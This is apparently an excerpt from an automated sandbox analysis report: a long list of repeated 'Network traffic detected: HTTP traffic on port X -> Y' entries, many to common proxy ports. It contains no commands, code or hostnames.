Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 37592
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 58378 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 15303
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 6693
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 9091
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 10005
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 8899
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 9480
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 32213
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 58839
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 37339
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 50293 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 9091 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 5717
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50336 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 52980
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 50363 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50299 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50428 -> 10005
Source: unknown	Network traffic detected: HTTP traffic on port 50361 -> 8193
Source: unknown	Network traffic detected: HTTP traffic on port 50385 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 50475 -> 8800
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 15303
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50346 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 9480 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 32896
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50293
Source: unknown	Network traffic detected: HTTP traffic on port 50384 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 50559 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 50431 -> 31280
Source: unknown	Network traffic detected: HTTP traffic on port 6693 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 50529 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50495 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50637 -> 45108
Source: unknown	Network traffic detected: HTTP traffic on port 50519 -> 25825
Source: unknown	Network traffic detected: HTTP traffic on port 50437 -> 9150
Source: unknown	Network traffic detected: HTTP traffic on port 50555 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 64767
Source: unknown	Network traffic detected: HTTP traffic on port 50469 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 31794
Source: unknown	Network traffic detected: HTTP traffic on port 50411 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 16691
Source: unknown	Network traffic detected: HTTP traffic on port 8800 -> 50475
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50428
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50428
Source: unknown	Network traffic detected: HTTP traffic on port 50465 -> 12446
Source: unknown	Network traffic detected: HTTP traffic on port 50514 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50521 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50377
Source: unknown	Network traffic detected: HTTP traffic on port 50526 -> 53948
Source: unknown	Network traffic detected: HTTP traffic on port 50689 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 7302 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9045
Source: unknown	Network traffic detected: HTTP traffic on port 50643 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50520 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50538 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 1981
Source: unknown	Network traffic detected: HTTP traffic on port 50535 -> 25843
Source: unknown	Network traffic detected: HTTP traffic on port 50561 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 1080 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50714 -> 58378
Source: unknown	Network traffic detected: HTTP traffic on port 50612 -> 10010
Source: unknown	Network traffic detected: HTTP traffic on port 50589 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50653 -> 20551
Source: unknown	Network traffic detected: HTTP traffic on port 50571 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 50624 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50588 -> 20000
Source: unknown	Network traffic detected: HTTP traffic on port 50712 -> 18080
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 82
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 37339
Source: unknown	Network traffic detected: HTTP traffic on port 50679 -> 31243
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 50807 -> 20816
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50728 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50672 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50681 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 50848 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50797 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50706 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 5443
Source: unknown	Network traffic detected: HTTP traffic on port 50727 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 50738 -> 9091
Source: unknown	Network traffic detected: HTTP traffic on port 50751 -> 5566
Source: unknown	Network traffic detected: HTTP traffic on port 50713 -> 6446
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 61464
Source: unknown	Network traffic detected: HTTP traffic on port 8899 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 32213
Source: unknown	Network traffic detected: HTTP traffic on port 50707 -> 9537
Source: unknown	Network traffic detected: HTTP traffic on port 50944 -> 43100
Source: unknown	Network traffic detected: HTTP traffic on port 50607 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 58507
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 47585
Source: unknown	Network traffic detected: HTTP traffic on port 50909 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50788 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 50790 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50771 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50942 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 50878 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50748 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50469
Source: unknown	Network traffic detected: HTTP traffic on port 50908 -> 30277
Source: unknown	Network traffic detected: HTTP traffic on port 50913 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 5717
Source: unknown	Network traffic detected: HTTP traffic on port 50827 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50868 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 16379 -> 50384
Source: unknown	Network traffic detected: HTTP traffic on port 51012 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 58378 -> 50714
Source: unknown	Network traffic detected: HTTP traffic on port 50863 -> 9050
Source: unknown	Network traffic detected: HTTP traffic on port 50965 -> 31654
Source: unknown	Network traffic detected: HTTP traffic on port 50882 -> 135
Source: unknown	Network traffic detected: HTTP traffic on port 50899 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 50927 -> 10006
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50386
Source: unknown	Network traffic detected: HTTP traffic on port 50904 -> 35760
Source: unknown	Network traffic detected: HTTP traffic on port 50953 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50900 -> 1081
Source: unknown	Network traffic detected: HTTP traffic on port 50831 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 58839
Source: unknown	Network traffic detected: HTTP traffic on port 50859 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50946 -> 26591
Source: unknown	Network traffic detected: HTTP traffic on port 50979 -> 5566
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 20614
Source: unknown	Network traffic detected: HTTP traffic on port 10010 -> 50612
Source: unknown	Network traffic detected: HTTP traffic on port 18080 -> 50712
Source: unknown	Network traffic detected: HTTP traffic on port 20551 -> 50653
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 51161 -> 54395
Source: unknown	Network traffic detected: HTTP traffic on port 50972 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 3389
Source: unknown	Network traffic detected: HTTP traffic on port 50989 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50938 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 51054 -> 5767
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 7895
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50559 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 51061 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51196 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50589
Source: unknown	Network traffic detected: HTTP traffic on port 31243 -> 50679
Source: unknown	Network traffic detected: HTTP traffic on port 51031 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51001 -> 4153
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 64767
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51060 -> 5630
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 48664
Source: unknown	Network traffic detected: HTTP traffic on port 51108 -> 8193
Source: unknown	Network traffic detected: HTTP traffic on port 51140 -> 10007
Source: unknown	Network traffic detected: HTTP traffic on port 51229 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 51007 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 51266 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51107 -> 5005
Source: unknown	Network traffic detected: HTTP traffic on port 51071 -> 228
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50728
Source: unknown	Network traffic detected: HTTP traffic on port 51073 -> 128
Source: unknown	Network traffic detected: HTTP traffic on port 51183 -> 6969
Source: unknown	Network traffic detected: HTTP traffic on port 51166 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50977 -> 10800
Source: unknown	Network traffic detected: HTTP traffic on port 51232 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51317 -> 2453
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 31794
Source: unknown	Network traffic detected: HTTP traffic on port 51280 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 51191 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51194 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51079 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 1081
Source: unknown	Network traffic detected: HTTP traffic on port 51245 -> 9401
Source: unknown	Network traffic detected: HTTP traffic on port 51195 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50985 -> 63997
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 16691
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 50727
Source: unknown	Network traffic detected: HTTP traffic on port 51247 -> 31280
Source: unknown	Network traffic detected: HTTP traffic on port 51215 -> 41890
Source: unknown	Network traffic detected: HTTP traffic on port 9091 -> 50738
Source: unknown	Network traffic detected: HTTP traffic on port 51251 -> 8197
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 6522
Source: unknown	Network traffic detected: HTTP traffic on port 51296 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 50788
Source: unknown	Network traffic detected: HTTP traffic on port 51235 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 51226 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 20000 -> 50588
Source: unknown	Network traffic detected: HTTP traffic on port 51281 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50868
Source: unknown	Network traffic detected: HTTP traffic on port 51242 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 10006 -> 50927
Source: unknown	Network traffic detected: HTTP traffic on port 51293 -> 9123
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 42214
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50771
Source: unknown	Network traffic detected: HTTP traffic on port 51305 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50899
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 1337
Source: unknown	Network traffic detected: HTTP traffic on port 51113 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50953
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 64353
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 50748
Source: unknown	Network traffic detected: HTTP traffic on port 51355 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 18877
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 50607
Source: unknown	Network traffic detected: HTTP traffic on port 51276 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 1976
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 51327 -> 28513
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 61464
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51266
Source: unknown	Network traffic detected: HTTP traffic on port 51319 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51377 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 16113
Source: unknown	Network traffic detected: HTTP traffic on port 5566 -> 50979
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 47585
Source: unknown	Network traffic detected: HTTP traffic on port 51309 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 51338 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 51369 -> 31679
Source: unknown	Network traffic detected: HTTP traffic on port 50944 -> 43100
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 58507
Source: unknown	Network traffic detected: HTTP traffic on port 50465 -> 12446
Source: unknown	Network traffic detected: HTTP traffic on port 50526 -> 53948
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51061
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 37339
Source: unknown	Network traffic detected: HTTP traffic on port 1080 -> 50831
Source: unknown	Network traffic detected: HTTP traffic on port 7302 -> 50938
Source: unknown	Network traffic detected: HTTP traffic on port 10007 -> 51140
Source: unknown	Network traffic detected: HTTP traffic on port 9401 -> 51245
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51166
Source: unknown	Network traffic detected: HTTP traffic on port 51336 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51376 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51353 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51352 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51359 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 42380
Source: unknown	Network traffic detected: HTTP traffic on port 51368 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51403 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51412 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50329 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 62607
Source: unknown	Network traffic detected: HTTP traffic on port 50343 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 48962
Source: unknown	Network traffic detected: HTTP traffic on port 6446 -> 50713
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51371 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 51379 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51424 -> 31654
Source: unknown	Network traffic detected: HTTP traffic on port 51365 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51325 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 51007
Source: unknown	Network traffic detected: HTTP traffic on port 128 -> 51073
Source: unknown	Network traffic detected: HTTP traffic on port 50706 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 5767 -> 51054
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51281
Source: unknown	Network traffic detected: HTTP traffic on port 9123 -> 51293
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 51305
Source: unknown	Network traffic detected: HTTP traffic on port 51317 -> 2453
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51242
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 5717
Source: unknown	Network traffic detected: HTTP traffic on port 50707 -> 9537
Source: unknown	Network traffic detected: HTTP traffic on port 50559 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 64767
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50529
Source: unknown	Network traffic detected: HTTP traffic on port 50904 -> 35760
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 51309
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 51248
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 31794
Source: unknown	Network traffic detected: HTTP traffic on port 51444 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 50391 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51060 -> 5630
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50446 -> 57745
Source: unknown	Network traffic detected: HTTP traffic on port 51452 -> 8123
Source: unknown	Network traffic detected: HTTP traffic on port 51436 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51107 -> 5005
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 51469 -> 31034
Source: unknown	Network traffic detected: HTTP traffic on port 50581 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51474 -> 10010
Source: unknown	Network traffic detected: HTTP traffic on port 50663 -> 44499
Source: unknown	Network traffic detected: HTTP traffic on port 50540 -> 16238
Source: unknown	Network traffic detected: HTTP traffic on port 51455 -> 8520
Source: unknown	Network traffic detected: HTTP traffic on port 51473 -> 8123
Source: unknown	Network traffic detected: HTTP traffic on port 51528 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 51113
Source: unknown	Network traffic detected: HTTP traffic on port 51470 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50670 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50780 -> 37445
Source: unknown	Network traffic detected: HTTP traffic on port 50759 -> 59991
Source: unknown	Network traffic detected: HTTP traffic on port 51529 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51532 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 51536 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50686 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51527 -> 8193
Source: unknown	Network traffic detected: HTTP traffic on port 51541 -> 8197
Source: unknown	Network traffic detected: HTTP traffic on port 51485 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51531 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51525 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51550 -> 6087
Source: unknown	Network traffic detected: HTTP traffic on port 51526 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51545 -> 1082
Source: unknown	Network traffic detected: HTTP traffic on port 51538 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 16691
Source: unknown	Network traffic detected: HTTP traffic on port 51511 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51530 -> 3389
Source: unknown	Network traffic detected: HTTP traffic on port 51546 -> 9400
Source: unknown	Network traffic detected: HTTP traffic on port 51533 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 31908
Source: unknown	Network traffic detected: HTTP traffic on port 51542 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 61464
Source: unknown	Network traffic detected: HTTP traffic on port 51567 -> 5811
Source: unknown	Network traffic detected: HTTP traffic on port 5443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 51535 -> 4153
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 47585
Source: unknown	Network traffic detected: HTTP traffic on port 51569 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51226 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51215 -> 41890
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 58507
Source: unknown	Network traffic detected: HTTP traffic on port 51289 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50944 -> 43100
Source: unknown	Network traffic detected: HTTP traffic on port 50906 -> 31653
Source: unknown	Network traffic detected: HTTP traffic on port 50872 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 7302 -> 51325
Source: unknown	Network traffic detected: HTTP traffic on port 51574 -> 7890
Source: unknown	Network traffic detected: HTTP traffic on port 51145 -> 60589
Source: unknown	Network traffic detected: HTTP traffic on port 50736 -> 808
Source: unknown	Network traffic detected: HTTP traffic on port 51032 -> 15303
Source: unknown	Network traffic detected: HTTP traffic on port 51027 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51015 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51120 -> 44607
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 48962
Source: unknown	Network traffic detected: HTTP traffic on port 50957 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51022 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 51327 -> 28513
Source: unknown	Network traffic detected: HTTP traffic on port 9080 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 51610 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51189 -> 14398
Source: unknown	Network traffic detected: HTTP traffic on port 51131 -> 999
Source: unknown	Network traffic detected: HTTP traffic on port 51606 -> 7237
Source: unknown	Network traffic detected: HTTP traffic on port 51631 -> 31679
Source: unknown	Network traffic detected: HTTP traffic on port 51667 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 51317 -> 2453
Source: unknown	Network traffic detected: HTTP traffic on port 8123 -> 51452
Source: unknown	Network traffic detected: HTTP traffic on port 51648 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51649 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51651 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51650 -> 31654
Source: unknown	Network traffic detected: HTTP traffic on port 51274 -> 38242
Source: unknown	Network traffic detected: HTTP traffic on port 55555 -> 51002
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51652 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51219 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51603 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 10010 -> 51474
Source: unknown	Network traffic detected: HTTP traffic on port 51502 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51638 -> 3000
Source: unknown	Network traffic detected: HTTP traffic on port 51703 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50671 -> 6666
Source: unknown	Network traffic detected: HTTP traffic on port 8123 -> 51473
Source: unknown	Network traffic detected: HTTP traffic on port 51155 -> 6010
Source: unknown	Network traffic detected: HTTP traffic on port 51635 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51639 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51292 -> 57447
Source: unknown	Network traffic detected: HTTP traffic on port 51644 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 51632 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51663 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51259 -> 64935
Source: unknown	Network traffic detected: HTTP traffic on port 9400 -> 51546
Source: unknown	Network traffic detected: HTTP traffic on port 51621 -> 9091
Source: unknown	Network traffic detected: HTTP traffic on port 51655 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51660 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51666 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51231 -> 9500
Source: unknown	Network traffic detected: HTTP traffic on port 51657 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 51659 -> 61818
Source: unknown	Network traffic detected: HTTP traffic on port 51664 -> 61725
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 51542
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 51750 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51645 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51658 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 51205 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 51682 -> 18080
Source: unknown	Network traffic detected: HTTP traffic on port 51763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 51641 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 1082 -> 51545
Source: unknown	Network traffic detected: HTTP traffic on port 5811 -> 51567
